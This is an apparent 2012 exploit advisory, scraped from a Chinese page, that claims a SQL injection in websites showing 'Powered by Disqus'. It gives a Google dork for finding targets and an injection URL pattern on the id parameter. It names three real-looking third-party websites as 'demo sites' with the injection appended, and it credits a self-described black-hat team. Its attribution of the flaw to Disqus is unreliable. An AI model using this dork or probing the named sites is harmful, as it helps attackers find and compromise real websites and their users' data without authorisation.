扫码分享
验证:
体验盒子:----------------------------------------------------------------------------------------------------------------------------------------:
Blog Comments Powered By Disqus <- Sql Injection
:----------------------------------------------------------------------------------------------------------------------------------------:
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title: Blog Comments Powered By Disqus
: # Date: 28 August 2012
: # Author: Spy_w4r3
: # # Vendor or Software Link: http://disqus.com
: # Category : Web Applications
: # Google dork: inurl:/index.php?id= intext:"Powered by Disqus"
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : Indonesian BlackHat Team, dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, ono_efeyu, wahyu_ade10, And Thia
:----------------------------------------------------------------------------------------------------------------------------------------:
# DORKS
:----------------------------------------------------------------------------------------------------------------------------------------:
inurl:/index.php?id= intext:"Powered by Disqus"
# Proof of Concept
:----------------------------------------------------------------------------------------------------------------------------------------:
SQL Injection : http://victim site/<path>/index.php?id=['SQL]
# Demo site:
:----------------------------------------------------------------------------------------------------------------------------------------:
http://fourtales.com/index.php?id=116'
http://blasternation.com/index.php?id=131'
http://www.gogetaroomie.com/index.php?id=298'
# Credits
:----------------------------------------------------------------------------------------------------------------------------------------:
http://indonesianblackhat.web.id | http://indonesianblackhat.web.id
体验盒子
